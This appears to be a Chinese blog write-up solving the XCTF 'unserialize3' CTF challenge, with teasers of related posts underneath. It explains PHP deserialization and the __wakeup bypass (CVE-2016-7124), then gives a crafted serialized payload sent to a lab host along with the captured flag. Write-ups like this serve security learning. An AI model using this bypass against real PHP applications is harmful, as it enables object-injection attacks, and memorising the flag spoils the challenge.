xctf攻防世界 Web高手进阶区 unserialize3

最新推荐文章于 2023-08-11 15:52:58 发布
最新推荐文章于 2023-08-11 15:52:58 发布
阅读量9.3k 收藏
点赞数
分类专栏: 攻防世界web之路 文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l8947943/article/details/125962981
版权

0x01. 进入环境

显示一段源代码:

class xctf{
	public $flag = '111';
	public function __wakeup(){
	exit('bad requests');
	}
?code=

0x02. 问题分析

0x02_1. 代码审计

首先,定义一个“xctf”类,这个类有两个成员属性,分别是 flag__wakeup。接下来是 __wakeup方法的实现,再就是最后一行变量 code 没有写完,估计就是想让我们传参进去完成它了。
这里的 __wakeup 函数是一个所谓的“魔术方法”,它在反序列化时会先于其他函数被调用,执行它的语句。
这就意味着,如果我们直接构造一个字符串,那么这个 __wakeup_ 会先一步执行,并直接 exit,这可不是我们想要的结果。

也就是说,我们构造的code的参数传入后,先被__wakeup方法首先调用。因此我们想办法绕过该函数即可。

0x02_2. 进行尝试

阅相关大神WP后才知道,一个漏洞(CVE-2016-7124)可以通过 使序列化字符串中表示对象属性个数的值大于真实的属性个数,以此跳过__wakeup 的执行

首先,序列化字符串的标准格式:O:<类名的长度>:"<类名>":<成员属性的个数>:{S:<成员属性名的长度>:"<成员属性名>";......} 这道题的话,如果要对 xctf 类进行正确的序列化,那么它的字符串应该是:O:4:"xctf":1:{S:4:"flag";S:3:"111";}

在线测试地址:https://www.dooccn.com/php/,使用如下代码即可验证。

<?php
class xctf{
		public $flag = '111';
		public function __wakeup(){
			exit('bad requests');
		}
	}
   $a = new xctf();
   print(serialize($a));
?>

0x02_3. 跳过__wakeup()函数

将序列化的字符串进行修改,修改序列化字符串中的属性个数,并完成字符串的拼接,以get方法传出,地址拼接如下:

http://61.147.171.105:56068/?code=O:4:“xctf”:2:{s:4:“flag”;s:3:“111”;}

得到最终答案,答案为:cyberpeace{d0e766c698b67400e771051e6b8301aa}

参考:

深度剖析PHP序列化和反序列化

攻防世界-Web进阶篇-005unserialize3
gyy990526的博客
03-14 2812
解:打开靶机是一段php代码,最后问你?code=应该等于多少,看见_wakeup()就是典型的反序列化的题。 题目比较简单,只有一个xctf类,首先需要对其实例化,再用serialize进行序列化输出字符串 : <?php class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } } $xctf=new xc
攻防世界 web高手进阶 10分题 biscuiti-300
闵行小鱼塘
11-07 1104
继续ctf的旅程,开始攻防世界web高手进阶的10分题,本文是biscuiti-300的writeup
攻防世界WEB---unserialize3
Red Rapefruit
07-23 1034
攻防世界WEBunserialize3 本文仅记录我自己的学习过程 unserialize3 题目: class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 给出的是一个代码块页面,而且还是不完整的,在这里我们可以得到两部分内容:1.一个xctf的类;2.要返回一个code参数,还有题目提示的反序列化函数unserialize().既然是反序列化,那么code传入很有可能x
学习笔记 | PHP反序列化漏洞
最新发布
m0_57133419的博客
08-11 311
其中wakeup()函数漏洞原理是类对象属性个数超过实际个数,也就是其中的类名称后面跟的数字就是属性,修改为2时,不执行wakeup函数。就不会输出bad request,如果用没修改过的序列化语句就会输出bad request。看到wakeup函数,先构造序列化语句输出。攻防世界unserialize3
ctf每日练习-第一天
想变得强大,虽然现在还弱不禁风
08-28 568
unserialize3(来自xctf web进阶unserialize3题目链接 class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 原理: PHP反序列化漏洞:执行unserialize()时,先会调用__wakeup()。 当序列化字符串中属性值个数大于属性个数,就会导致反序列化异常,从而跳过__wakeup()。 本题_wakeup会执行exit(),所以要绕
攻防世界-web-高手进阶-unserialize3
wyj_1216 House
07-10 946
题目 writeup class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } 分析上述代码,发现:_wakeup() 考虑反序列化 <?php class xctf{ public $flag = '111'; public function __wakeup(){ exi...
XCTF靶场实战(1)
weixin_51339377的博客
03-29 1281
新手练习 1 禁用js 2 robots.txt在网站根目录 里面可以规定搜索引擎看或者不看什么内容 3 xxxx.txt.bak index.phpsxxxx.rar.zip.7z.tar.gz.bak.txt.swp github www.xxx.com/.git/config 苹果电脑 .DS_Store 文件/目录泄露 svn文件泄露 subversion,开源代码控制系统 www.xxx.com/.svn/entires ...
XCTF WEB 高手进阶 unserialize3
qq_30076719的博客
11-04 251
看题目名字可以知道,这一题考的是反序列化漏洞,那么要做这一题之前,需要补充一点知识 1、序列化函数:serialize(),简单理解就是把类实例化的代码转换成字符串,可以在url上赋值,会先调用 __sleep()魔术方法 2、反序列化函数:unserialize(),很明显,就是把字符串还原,会先调用__wakeup()魔术方法 3、反序列化漏洞,这个要先理解序列化后的字符串: o:4:“xctf”:1:{s:4:“flag”;s:3:“111”;} o表示对象 a表示数组 s表示字符 i表示数字 其后数
攻防世界 web高手进阶 10分题 Background_Management_System
闵行小鱼塘
10-21 1087
继续ctf的旅程,开始攻防世界web高手进阶的10分题,本文是Background_Management_System的writeup
攻防世界 web高手进阶 8分题 love_math
闵行小鱼塘
10-03 1139
继续ctf的旅程,开始攻防世界web高手进阶的8分题,本文是love_math的writeup
攻防世界-Webunserialize3解题思路
一个手掰橙的博客
09-23 3153
CTF解题思路
PHP反序列化小做
qq_74020399的博客
05-18 221
绕过方法:在传入的序列化字符串在反序列化对象时与真实存在的参数个数不同时会跳过执行wakeup()函数,即当前函数中只有一个参数$flag,若传入的序列化字符串中的参数个数为2即可绕过。原理:_wakeup()函数若不绕过则会将马上就要反序列化的字串中file给你替换为index,这样就会导致页面回到当前页面。在传入的序列化字符串在反序列化对象时与真实存在的参数个数不同时会跳过执行wakeup()函数。wakeup():反序列化之前检查执行的函数,不论如何都会优先执行wakeup()方法。
##[攻防世界]unserialize3题目wp
qq_60787987的博客
03-13 4554
##[攻防世界]unserialize3题目wp 从题目我们可以看出,这道题是一道基础的php反序列化题。而进入网址后我们可以看到如下代码 class xctf { public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 通过简单的代码分析我们可以看出这个代码主要定义了一个变量,然后又对该变量进行了反序列化,并且输出“bad request”这一字符串。而底下的?code= 我们猜测应该是用于传递数据
CTF_Web:反序列化学习笔记(二)CTF经典考题由浅至深
AFCC_的博客(Web_Dog)
08-16 7342
0x00 CTF中的反序列化题目 这类题目中主要是利用反序列化各种魔术方法的绕过或调用,从而构造符合条件的序列化字符串,完成特定的功能,在这一点上对于整个代码段的执行流程要很清楚。我们先从最简单的开始看起。 0x01 攻防世界unserialize3 题目显示的源码为: class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 在这里我们可以看到只有一个魔术方法,而__w
攻防世界web进阶
weixin_54787877的博客
02-21 315
unserialize3 知识点:反序列化漏洞,wakeup魔法函数 php <?php class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= ?> 先对代码补全然后进行审计。 class xctf{ //定义一个名为xctf的类 public flag=′111′;//定义一个公有的类属性flag = '111';
php序列化绕过wakeup,PHP反序列化漏洞#XCTF题 : unserialize3#绕过wakeup()函数
weixin_42544461的博客
03-22 523
1.代码与结果代码如下:class xctf{public $flag='111';public function __wakeup(){exit('bad requests');}}$content = new xctf();echo serialize($content);?>结果如下:O:4:"xctf":1:{s:4:"flag";s:3:"111";}实验截图:2.相关姿势点2.1...
反序列化(下)
qq_62046696的博客
05-26 226
目录 unserialize3攻防世界进阶) class xctf{ #定义一个以xctf为名的类 public $flag = '111'; #给xctf类定义一个$falg,并且赋值为111 public function __wakeup(){ #定义__wakeup()构造方法,#在对象反序列化的时候触发 exit('bad requests'); 退出,肯定是绕过wakeup这种方法 } ?code=
CTF_Web攻防世界高手进阶题WP(9-14)
AFCC_的博客(Web_Dog)
08-08 3165
持续更新ing 0x09 PHP2 题目只有一句话,Can you anthenticate to this website?,其实说实话没什么思路,根据dirsearch的结果,只有index.php存在,里面也什么都没有,各路前辈说index.phps存在源码泄露,于是看了看。 <?php if("admin"===$_GET[id]) { echo("<p>not allowed!</p>"); exit(); } $_GET[id] = urldecode
Web前端之动态执行JavaScrip、微信小程序无法使用eval和Function的解决办法、字符串表达式、字符串运算、数学计算、parseFloat、Function、pop
CSDN博客主页地址:https://mengjian.blog.csdn.net/
11-17 1719
Web前端之动态执行JavaScrip、微信小程序无法使用eval和Function的解决办法、字符串表达式、字符串运算、数学计算、parseFloat、Function、pop
攻防世界unserialize3
08-02
根据提供的引用内容,我们可以得到一个xctf类的代码块,其中包含了一个flag属性和一个__wakeup()方法。这个类的对象被序列化后,可以使用unserialize()函数将其还原为PHP的值。[2]在序列化过程中,serialize()函数会检查类中是否存在一个魔术方法__sleep(),如果存在,该方法会先被调用,然后才执行序列化操作。[3] 根据题目的描述,我们可以猜测在攻防世界unserialize3中,需要对传入的code参数进行反序列化操作。由于给出的代码块中有一个xctf类的序列化字符串,我们可以尝试使用unserialize()函数对其进行反序列化。具体的代码如下所示: ```php <?php class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } } $code = $_GET['code']; // 获取传入的code参数 $obj = unserialize($code); // 反序列化code参数 // 判断反序列化后的对象是否为xctf类的实例 if ($obj instanceof xctf) { echo $obj->flag; // 输出flag属性的值 } else { echo 'Invalid code'; // 如果不是xctf类的实例,则输出错误信息 } ?> ``` 在上述代码中,我们首先获取传入的code参数,然后使用unserialize()函数对其进行反序列化操作。接着,我们判断反序列化后的对象是否为xctf类的实例,如果是,则输出flag属性的值;如果不是,则输出错误信息。这样就完成了对传入的code参数的反序列化操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

l8947943

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值